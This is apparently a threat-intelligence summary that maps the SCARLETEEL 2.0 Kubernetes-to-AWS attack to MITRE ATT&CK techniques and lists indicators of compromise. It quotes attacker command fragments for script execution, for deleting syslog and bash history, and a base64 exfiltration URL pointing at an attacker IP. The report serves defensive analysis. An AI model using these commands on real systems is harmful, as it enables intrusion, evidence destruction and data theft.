Scarleteel 2.0 is analyzed through the MITRE ATT&CK framework to map how adversaries move from an exposed Kubernetes/JupyterLab deployment to credential theft, execution, privilege escalation, lateral movement in AWS, and data exfiltration. The investigation also highlights defense evasion like log and history deletion and culminates in Russian S3-compatible exfil endpoints and cloud cryptomining activity.
Keypoints
- SCARLETEEL 2.0 is examined using the MITRE ATT&CK framework to understand attacker tactics, techniques, and procedures across the attack lifecycle.
- Initial access occurred via a publicly exposed, compromised containerized workload in a Kubernetes cluster hosting JupyterLab notebooks.
- attackers retrieved AWS credentials via the EC2 instance metadata service (169.254.169.254) to pivot into the victim’s cloud environment.
- Pandora/Mirai-related execution followed by script-based downloads and shell execution within the compromised host.
- Privilege escalation exploited IAM policy weaknesses and admin-account naming conventions to gain greater access.
- Lateral movement leveraged Pacu and AWS CLI to enumerate and exploit cloud permissions, culminating in new AWS resources and mining activity.
- Command and control and exfiltration used Russian endpoints and cloud-storage-like targets, including base64-encoded data sent to remote hosts and S3-compatible storage.
- Defense evasion included log and shell-history deletion and running a Monero/XMRig miner in the background to obscure activity.
- The analysis underscores the need for end-to-end cloud and container security controls, continuous monitoring, and rapid response.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Initial access was achieved by exploiting a compromised containerized workload exposed to the public. Quote: “…the initial breach was achieved by exploiting a compromised containerized workload exposed to the public.”
- [T1059.004] Unix Shell – Execution through shell operations, including downloading and running scripts. Quote: “chmod +x Pandora.sh … bash -s …”
- [T1552.001] Credentials in Files – Adversaries search for credential files such as .git-credentials and accounts.xml in the filesystem. Quote: “CRED_FILE_NAMES array … searching for $CREFILE”
- [T1078] Valid Accounts – Privilege escalation involved admin accounts and IAM policy manipulation. Quote: “The exploit was achieved due to a specific naming convention used for all admin accounts… ‘adminJoe’, ‘adminBob’ …”
- [T1567.002] Exfiltration to Cloud Storage – Data was exfiltrated to a Russian S3-compatible endpoint via cloud storage. Quote: “By using the ‘–endpoint-url’ option, they did not send the API requests to the default AWS services endpoints, but instead to hb.bizmrg.com, which redirects to mcs.mail.ru/storage, a Russian S3-compatible object storage.”
- [T1070] Indicator Removal on Host – Defense evasion through removal of logs and command history. Quote: “rm -f /var/log/syslog.* … rm -f ~/.bash_history”
- [T1496] Resource Hijacking – Monero cryptominer executed in the background to expand attack capabilities. Quote: “the Monero cryptominer was executed in the background using the names for containerD and the systemD service as a defense evasion technique.”
Indicators of Compromise
- [IP Address] – AWS instance metadata service and internal cloud endpoints – 169.254.169.254, 100.64.0.1
- [IP Address] – Exfiltration and C2-related targets – 45.9.148.221, 175.102.182.6, 5.39.93.71
- [Domain] – External endpoints used for exfiltration or redirection – hb.bizmrg.com, mcs.mail.ru/storage, temp.sh
- [File] – Credentials-related filenames scanned/targeted – .git-credentials, accounts.xml
- [URL] – Exfiltration and data upload endpoints – https://45.9.148.221/in/in.php?base64=…, http://temp.sh/